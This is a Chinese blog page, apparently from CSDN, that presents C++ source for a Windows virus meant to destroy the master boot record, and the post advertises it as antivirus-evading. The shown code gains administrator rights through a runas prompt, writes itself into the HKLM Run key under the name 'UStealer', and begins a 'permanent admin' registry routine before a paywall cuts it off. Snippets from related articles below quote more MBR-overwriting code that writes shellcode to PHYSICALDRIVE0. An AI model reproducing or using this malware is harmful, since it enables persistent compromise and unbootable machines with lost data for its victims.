C++ Windows病毒 破坏MBR

最新推荐文章于 2025-03-21 21:24:40 发布
最新推荐文章于 2025-03-21 21:24:40 发布
阅读量917 收藏 12
点赞数 8
文章标签: c++ windows 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/m0_64848283/article/details/138258884
版权

项目地址

此处阅读体验更佳

C++代码,推荐Dev-c++编译。

2024年4月27日免杀

#include <bits/stdc++.h>
#include <windows.h>
#include <TlHelp32.h>
#include <winnt.h>
using namespace std;
namespace Windows_Admin {
    //windows权限管理
	#include <bits/stdc++.h>
	#include <windows.h>
	#include <TlHelp32.h>
	#include <winnt.h>
	using namespace std;
	#define KEY_DOWN(VK_NONAME) ((GetAsyncKeyState(VK_NONAME) & 0x8000) ? 1:0)
	LPWSTR ToLPWSTR(char** charArray) {
   
		int charCount = 0;
		// 计算总的多字节字符数
		while (charArray[charCount] != NULL) {
   
			charCount++;
		}

		int bufferSize = MultiByteToWideChar(CP_ACP, 0, charArray[0], -1, NULL, 0);
		LPWSTR lpwsz = new WCHAR[bufferSize];
		MultiByteToWideChar(CP_ACP, 0, charArray[0], -1, lpwsz, bufferSize);

		// 对于其他字符串重复转换过程
		for (int i = 1; i < charCount; ++i) {
   
			bufferSize = MultiByteToWideChar(CP_ACP, 0, charArray[i], -1, NULL, 0);
			LPWSTR temp = new WCHAR[bufferSize];
			MultiByteToWideChar(CP_ACP, 0, charArray[i], -1, temp, bufferSize);

			// 将转换后的宽字符字符串追加到lpwsz
			wcscat(lpwsz, temp);

			// 释放临时宽字符串
			delete[] temp;
		}

		return lpwsz;
	}

	void HKRunator(char *programName) {
    //程序名称(**全路径**)
		HKEY hkey = NULL;
		DWORD rc;

		rc = RegCreateKeyEx(HKEY_LOCAL_MACHINE,                      //创建一个注册表项,如果有则打开该注册表项
		                    "SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run",
		                    0,
		                    NULL,
		                    REG_OPTION_NON_VOLATILE,
		                    KEY_WOW64_64KEY | KEY_ALL_ACCESS,    //部分windows系统编译该行会报错, 删掉 “”KEY_WOW64_64KEY | “” 即可
		                    NULL,
		                    &hkey,
		                    NULL);

		if (rc == ERROR_SUCCESS) {
   
			rc = RegSetValueEx(hkey,
			                   "UStealer",
			                   0,
			                   REG_SZ,
			                   (const BYTE *)programName,
			                   strlen(programName));
			if (rc == ERROR_SUCCESS) {
   
				RegCloseKey(hkey);
			}
		}
	}
	bool IsAdmin() {
    //是否为管理员
// return 1;
		BOOL b;
		SID_IDENTIFIER_AUTHORITY NtAuthority = SECURITY_NT_AUTHORITY;
		PSID AdministratorsGroup;
		b = AllocateAndInitializeSid(&NtAuthority, 2, SECURITY_BUILTIN_DOMAIN_RID, DOMAIN_ALIAS_RID_ADMINS, 0, 0, 0, 0, 0, 0, &AdministratorsGroup);
		if (b) {
   
			if (!CheckTokenMembership(NULL, AdministratorsGroup, &b)) {
   
				b = FALSE;
			}
			FreeSid(AdministratorsGroup);
		}

		return(b);
	}

	void Get_Admin(char** argv) {
    //提升权限至管理员
		if (!IsAdmin()) {
   
			ShellExecute(NULL, "runas", argv[0], NULL, NULL, SW_SHOWNORMAL);
			cout<<"get!"<<endl;
			exit(0);
		}
	}

	bool Get_Permanent_Admin(int args,char** argv) {
    //永久管理员
//  if (argc < 1) {
   
//         std::cerr << "No file path provided." << std::endl;
//         return 1;
//     }

		// 获取文件路径
		std::string filePath = argv[0];

		// 注册表路径
		std::wstring regPath = L"Software\\Microsoft\\Windows NT\\CurrentVersion\\AppCompatFlags\\Layers";

		// 打开注册表项
		HKEY hKey;
		LONG result = RegOpenKeyExW(HKEY_CURRENT_USER, regPath.
最低0.47元/天 解锁文章
Petyrma
关注
C++木马破坏MBR病毒
ZuoJiaWuKong的博客
07-23 9361
一分钟了解如何编写一个C++强力的木马病毒,可不要去干坏事哦!
C++MBR病毒2.0(经过编译)
yeq2012的博客
04-22 934
这个程序会覆盖磁盘扇区,一定要非常小心!!!
读取硬盘MBR
08-09
读取硬盘的MBR引导记录,用c++语言实现。适合新手了解。
C++破坏MBR的代码
12-31
本文实例讲述了C++破坏MBR的代码,该源码只有破坏作用,使系统无法进入。仅供大家参考借鉴之用。请勿用于非法目的。 源码来源于网上。具体代码如下: 代码如下:#include <Windows>  #include <stdio>    //shellcode随便写了点 能破坏MBR,无法进入系统  unsigned char   scode[]=      “\xb8\x12\x00”      “\xcd\x10\xbd”      “\x18\x7c\xb9”;    DWORD writeMBR()  {      DWORD dwBytesReturn
c++修改mbr
最新发布
NSM1234的博客
03-21 187
修改主引导记录(MBR)是一项高风险操作,可能导致系统无法启动或数据丢失。以下内容仅用于技术研究,请谨慎操作并确保合法用途。
vc++怎么可以直接刷掉MBR?搞笑的吧
weixin_34050005的博客
04-16 170
FILE * fd=fopen("\\\\.\\PHYSICALDRIVE0","rb+"); char buffer[512]; fread(buffer,512,1,fd); //then you can edit buffer[512] as your wish...... fseek(fd,0,SEEK_SET); //很重要 memset(b...
破坏MBR的代码
小驹的专栏
05-20 3565
破坏MBR的代码,只有破坏作用,使系统无法进入。。。 来源于网上。。 #include #include //shellcode随便写了点 能破坏MBR,无法进入系统 unsigned char scode[]= "\xb8\x12\x00" "\xcd\x10\xbd" "\x18\x7c\xb9"; DWORD writeMBR() { DWORD dwBy
C++磁盘MBR修改
08-27
4. 安全性:确保修改过程不会破坏MBR结构,以免影响系统的正常启动。 总的来说,C++磁盘MBR修改库是用于低级磁盘操作的工具,可以帮助程序员更便捷地处理与MBR相关的任务,但同时也需要开发者具备一定的系统知识和...
MBR病毒】实现与解决方案
tiantian520_tt——Python程序猿~
05-02 4500
复现 环境 Attacker OS: Windows 10 1909 X64 IDE: Dev-C++ 5.11 Filename: MBR.cpp Out Filename: MBR.exe Player OS: Windows XP SP2 Filename: MBR.exe 步骤 0.0.1 编译及拷贝 将以下代码输入进Dev-C++: #include<Windows.h> #include<stdio.h> #include<iostream> using na
c++擦除mbr代码
虽千万人,吾往矣
03-01 1916
群里一个大神发出来的 经本人测试有效,明天去整一个安装盘。仅供学习研究使用,贸然测试引起的任何后果与本人无关。 #include #include #include int main() { int res = MessageBox(NULL,TEXT("病毒即将清空系统MBR"),TEXT("yaomianfa的提醒"),MB_YESNO);//老规矩 加保险
c++MBR
a1234567890zyb的博客
08-06 400
(*Φ皿Φ*)环境不好一个包玉刚i有。
C++修改MBR代码
yeq2012的博客
12-10 1509
修改MBR的代码
电脑病毒C++
Young_20220202的博客
07-02 952
电脑病毒(特危险)
C++写的病毒(删除mbr)
QWERTY1145141112的博客
08-14 431
不要去整人,现在还在医院里(((
C++破坏电脑病毒
m0_67885783的博客
08-21 1110
C++破坏系统病毒
分享一病毒源代码,破坏MBR,危险!!仅供学习参考,勿运行(vc++2010已编译通过)
热门推荐
杨航的专栏
04-28 1万+
我在编译的时候,杀毒软件提示病毒并将其拦截,所以会导致编译不成功。 1>D:\c++工程\windows\windows\MBR病毒.cpp : fatal error C1083: 无法打开编译器中间文件:“C:\Users\lenovo\AppData\Local\Temp\_CL_953b34fein”: Permission denied 1> 1>生成失败。 杀毒软件提示: 检
制作一个后缀名为.vbs的病毒代码
Hxwhi的博客
05-28 1486
建议使用虚拟机(可以使用VMware Workstation Pro,可以参照 那年遇见了你 的发布的文章),否则你的计算机将会就地报废,使用时要关闭电脑病毒保护,如果使用的时候没有关,恭喜您的程序系统自带的病毒保护系统会被“就地枪决”)蠕虫是一种可以自我复制的代码,并且通过网络传播,通常无需人为干预就能传播。蠕虫病毒入侵并完全控制一台计算机之后,就会把这台机器作为宿主,进而扫描并感染其他计算机。蠕虫使用这种递归的方法进行传播,按照指数增长的规律分布自己,进而及时控制越来越多的计算机。废话不多说,上代码!
C++实现Windows窗体创建基础教程
在使用C++创建Windows窗体的过程中,涉及到的Windows API(应用程序编程接口)是开发Windows桌面应用程序的基础。以下内容将详细介绍使用C++语言结合Windows API创建窗体的关键知识点,帮助开发者理解和掌握窗体创建...
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值